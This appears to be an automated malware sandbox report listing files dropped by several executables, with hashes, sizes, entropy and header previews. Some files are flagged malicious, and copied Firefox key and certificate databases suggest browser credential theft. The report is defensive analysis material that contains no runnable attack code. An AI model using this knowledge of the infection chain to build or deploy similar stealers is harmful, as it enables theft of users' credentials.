SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\907.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	760320
Entropy (8bit):	6.561572491684602
Encrypted:	false
SSDEEP:
MD5:	544CD51A596619B78E9B54B70088307D
SHA1:	4769DDD2DBC1DC44B758964ED0BD231B85880B65
SHA-256:	DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
SHA-512:	F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Qpgzfyd.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Syvzwodfd.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Totdtzo.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Uoqiskvxd.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Upjkcszrwdi\fqs92o4p.default-release\cert9.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	229376
Entropy (8bit):	0.64343788909108
Encrypted:	false
SSDEEP:
MD5:	B6787B79D64948AAC1D6359AC18AB268
SHA1:	0831EB15AB2B330BE95975A24F8945ED284D0BA4
SHA-256:	9D6FD3B8AB8AA7934C75EDE36CEB9CF4DDAD06C5031E89872B4E814D7DB674E2
SHA-512:	9296866380EF966F1CB6E69B7B84D1A86CD5AE8D9A7332C57543875FAA4FC7F1387A4CF83B7D662E4BAB0381E4AFC9CB9999075EBB497C6756DF770454F3530E
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Upjkcszrwdi\fqs92o4p.default-release\key4.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08436842005578409
Encrypted:	false
SSDEEP:
MD5:	2CD2840E30F477F23438B7C9D031FC08
SHA1:	03D5410A814B298B068D62ACDF493B2A49370518
SHA-256:	49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
SHA-512:	DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Xwjmnm.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Zhszhi.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Zlwbi.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\etopt.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\3613.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	4544252
Entropy (8bit):	7.996381968139493
Encrypted:	true
SSDEEP:
MD5:	F77ABC2F79780428CA514C0041C8B9E9
SHA1:	2D2BD0CFE56FBCF3C1CA78790927531B5219A5A0
SHA-256:	D02718250398639963DB5042756D15F138F518F1F4CEA9914A685C7B7E59D325
SHA-512:	B6067652EB8C6778825ECBDD2252115F08167F121A41EFAA894FACBE71B45D9FC732CB62D1BEC843D922E402CCA76FFA1523607DBA1ACEC6A806E40BF18002CF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.....F..G.w.F.....F..v..F...@..F.Rich.F.........PE..L...a.d.................d...........3............@..........................0............@.................................0............L...........................................................................................................text...jb.......d.................. ..`.rdata..4............h..............@..@.data...8............\|..............@....ndata.......P...........................rsrc....L.......N..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\tuc4.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	704512
Entropy (8bit):	6.496956945559699
Encrypted:	false
SSDEEP:
MD5:	A7662827ECAEB4FC68334F6B8791B917
SHA1:	F93151DD228D680AA2910280E51F0A84D0CAD105
SHA-256:	05F159722D6905719D2D6F340981A293F40AB8A0D2D4A282C948066809D4AF6D
SHA-512:	E9880B3F3EC9201E59114850E9C570D0AD6D3B0E04C60929A03CF983C62C505FCB6BB9DC3ADEEE88C78D43BD484159626B4A2F000A34B8883164C263F21E6F4A
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........q............@..............................................@...............................%..................................................................................................................CODE....(d.......f.................. ..`DATA.................j..............@...BSS..................\|...................idata...%.......&...\|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_RegDLL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.026670007889822
Encrypted:	false
SSDEEP:
MD5:	0EE914C6F0BB93996C75941E1AD629C6
SHA1:	12E2CB05506EE3E82046C41510F39A258A5E5549
SHA-256:	4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
SHA-512:	A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................\|.......\|.......\|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	5.8975201046735535
Encrypted:	false
SSDEEP:
MD5:	3ADAA386B671C2DF3BAE5B39DC093008
SHA1:	067CF95FBDB922D81DB58432C46930F86D23DDED
SHA-256:	71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
SHA-512:	BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P.......................................................................P.......P..(............................p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.215994423157539
Encrypted:	false
SSDEEP:
MD5:	4FF75F505FDDCC6A9AE62216446205D9
SHA1:	EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:	A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:	BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\tuc4.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	704512
Entropy (8bit):	6.496956945559699
Encrypted:	false
SSDEEP:
MD5:	A7662827ECAEB4FC68334F6B8791B917
SHA1:	F93151DD228D680AA2910280E51F0A84D0CAD105
SHA-256:	05F159722D6905719D2D6F340981A293F40AB8A0D2D4A282C948066809D4AF6D
SHA-512:	E9880B3F3EC9201E59114850E9C570D0AD6D3B0E04C60929A03CF983C62C505FCB6BB9DC3ADEEE88C78D43BD484159626B4A2F000A34B8883164C263F21E6F4A
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........q............@..............................................@...............................%..................................................................................................................CODE....(d.......f.................. ..`DATA.................j..............@...BSS..................\|...................idata...%.......&...\|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	183808
Entropy (8bit):	6.997216731878316
Encrypted:	false
SSDEEP:
MD5:	F2AD59753E17F68CF6F6F251E0D4DEEC
SHA1:	1FB2EA00DEA61357F260892A71E760B80FAF8C68
SHA-256:	24A617155FAB47FEA082076061BB97CC3B16C03C84691DC1CE62675764D587DA
SHA-512:	414BADB28F29FE7A3199AA7B909283E02EC06141E0EF99BAAA6E9FFC450D37BAC70EC7A7DBBA41FE217E40156142DC6BDAE4DE4A3BD79B69373E3307F1E7B5D1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L....l.d.....................B......<.......@....@...........................D.....i.......................................(k..d.....D.@Q...........................A...............................^..@............@...............................text....(......................... ..`.rdata..~4...@...6..................@..@.data...\|.B..........d..............@....rsrc...@Q....D..R...\|..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nss49BB.tmp\Checker.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	42496
Entropy (8bit):	5.874068067847773
Encrypted:	false
SSDEEP:
MD5:	8DCC038CE15A235EA9E22FC9663E4C40
SHA1:	CC702C128E3035D42220BD504D6C061967D3726F
SHA-256:	64B23AA5CA4E2E516FAE3D2480957D6F1065C91CAA930E0FFAC2BDA1CADEA76A
SHA-512:	BF81FEE736E02680B2D5CD23DD360430B9BD97AD1F75AE9485E82B548F61B83A092C5E17A4D537A06ECE6384003AEB9B7B9E7EAC4A7FFB2B371160570BCE6B81
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.dI6...6...6...-...(...-...8...-...r...?..3...6...}...-...4...-...7...-...7...Rich6...........PE..L.....e...........!.....T...N...............p............................................@.........................0...c...D...<...................................................................P...@............p...............................text....S.......T.................. ..`.rdata...+...p...,...X..............@..@.data...\|...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nss49BB.tmp\Zip.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	6.189898793447208
Encrypted:	false
SSDEEP:
MD5:	0F459C2BD249A8B1F4B1B598D8E5299D
SHA1:	CA47103107CD686D002CB1C3F362EFC5750BFEB4
SHA-256:	ACD3D2B809C320BB8B93385212BAC23536BD6894E8E2638A5E85468CCD54FB3B
SHA-512:	1A7E6E48EE9D966A59082F2AD3B6405D8BBDC1A45F54DEC1DE9FD1A16B34BB0DC422683ECFFD5DFB484DB3C5C42CAEA410D49DEBEAE50BA3979520834212AFE0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5...T...T...T..C.E..T....C..T....w.T....v..T...,N..T...T..T....r..T....F..T....@..T..Rich.T..........PE..L.....e...........!.........n.......o.......................................p.......H....@.........................P...W.......P....@.......................P..........................................@...............$............................text...I........................... ..`.rdata...I.......J..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nss4AA6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	data
Category:	dropped
Size (bytes):	717308
Entropy (8bit):	7.999713741633748
Encrypted:	true
SSDEEP:
MD5:	0C42DBAB7F16FF55877DCAB817476A7A
SHA1:	BBAC8051DF8C4D571D7CEEAAB6C3674EED602436
SHA-256:	55072C33F4900EF1A1CBB57FAAF71D4D36FE2EE34F769BCC55090F48EC21638D
SHA-512:	21E98FA899E92ECF85B5913060ED4BF44C70D88DA91BF5E4F7041BF1EB3A5541C9C19E660F0D281DE9976AACF728731F77F55DA5BB611BEBB47EF63330620BD1
Malicious:	false
Reputation:	unknown
Preview:	...e...,7<.z......a...,7<.(W........,6<.(..e.`P.@.[.,7..(E.....N.<.\RYbE2....Q...3H1H.y.Uj.jM.)=6(...j"8..k...E.D.X...z..C.l.;.d%.j....2......Qf.,^?6~.CL.......Z....i..[.g..S..R..H..2}\!k..v...`.n...B....'.E..F].lc.......Gf.NWt...6D..mz....`..{c...e.....z..[.U...@.......l...$.Z.3..>..z..x..3A.!......kg.s..L.....J...q..EQ./..S.N.....:s...K\.!..0.-.H...-u..zX..C1....e.l.h..&.<.e..U!.K.._.....tXi.....W.Q.a....wi.P.h..g..,.C...<.AJ.^.G.,....x..[....,..4.......]......[...+S\|r.T.i../.'...G}0A...f^....v...4o......T.^..6...@/...).jH..H..~`....=.:Q.Q.S.q.....{W.4....x.<+....zR..Z.\%...U1rH..G!......?..'vr".5....K"2..%9...;....z..o+d..h{.;...n.>W?..l.F..;.Lp......R.D..............Wc..t.........nX.D.)gC...:..0..\|..7..b.y.M.......C...\k6N.\.b(&.t.4..X.a..!.%..x.S......b.....L.<F.f...`.C]..?..2.1..)<.......5g@m....\|...^Etl_.....a...#Wi~tOC}H...ZST.Y......9\.&H+An.jsu.4...e.]S.W.....`y...k5'<..1...(._..p.. .....O.......}y8......Oc............B..

C:\Users\user\AppData\Local\Temp\nsu43BF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	12
Entropy (8bit):	2.1258145836939115
Encrypted:	false
SSDEEP:
MD5:	416B4BAB4CCD524D0B3EB958E5486867
SHA1:	E5E94B6F9F22E9FCD96613544935E9948B523E55
SHA-256:	BE4EFD67A84F76F86829B7CE4AE4F0E2C091C778D2E2AF9D6A3BC4EA6AB7D396
SHA-512:	306BFF69AC28C25504276FC96CFFB620F38D9127244E20078E4D44805B87DDA541E51D2246CA9BDE0D48BCFE79DB94402CC735F89BF6679B917985596A9FC956
Malicious:	false
Reputation:	unknown
Preview:	212.102.41.2

C:\Users\user\AppData\Local\Temp\nsu43C0.tmp\INetC.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	25600
Entropy (8bit):	5.391050633650523
Encrypted:	false
SSDEEP:
MD5:	40D7ECA32B2F4D29DB98715DD45BFAC5
SHA1:	124DF3F617F562E46095776454E1C0C7BB791CC7
SHA-256:	85E03805F90F72257DD41BFDAA186237218BBB0EC410AD3B6576A88EA11DCCB9
SHA-512:	5FD4F516CE23FB7E705E150D5C1C93FC7133694BA495FB73101674A528883A013A34AB258083AA7CE6072973B067A605158316A4C9159C1B4D765761F91C513D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'9<.cXR.cXR.cXR.D.).jXR.cXS.6XR.D. .`XR.D.(.bXR.D...bXR.D.*.bXR.RichcXR.........................PE..L....T.[...........!.....@...j.......E.......P.......................................................................M..l...\F..d.......(.......................\.......................................................d............................text...\>.......@.................. ..`.data...dW...P.......D..............@....rsrc...(............R..............@..@.reloc..\............\..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\toolspub2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\3613.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	6.72767352779887
Encrypted:	false
SSDEEP:
MD5:	2D24E3BAA2A16E47BEE10E91381E6391
SHA1:	013B59B2CD69E93694196DFB34FDDC8684CFD619
SHA-256:	FF2E975C649D66476C48AC9FE64455EB0727FEDE676D000728D09D62D2DC6DB4
SHA-512:	BE515895B29390E1C9C44620F7B18C8AE57D08627B8BBF7484B551CCF079011F95BAA78E71C1A2A6280B544DD06444B509B7C9BA126B525D813AFD68010B03E7
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F..'r..'r..'r..u...'r..u.'r..u.3'r......'r..'s.?'r..u...'r..u.'r..u.'r.Rich.'r.................PE..L...:..c............................j.............@..................................Q......................................L...P........'..............................................................@............................................text............................... ..`.rdata...9.......:..................@..@.data....g...0...&..................@....zomoxolA............B..............@....rsrc....'.......(...F..............@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tuc4.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\3613.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8139021
Entropy (8bit):	7.9995458783294495
Encrypted:	true
SSDEEP:
MD5:	69CF42BBFE7778CE5D750AA4B51AAD9D
SHA1:	56DDF58F4DAEFCEF0426E0DD4E2328EC9B26D103
SHA-256:	66B0DB1D4E7E6BA98F066E85A540245F95BC625137C6C5D65D6E21DCDCCDBEAD
SHA-512:	B1BB13B908D11B072395B5E0F1D5C4B7FDF10F72655D6BC05CF39965A38DDE71A6E1F00E43CA883DD01033F5696D3BA3E9F9571A7EB2BBFCB54EFAE34C01572E
Malicious:	true
Reputation:	unknown
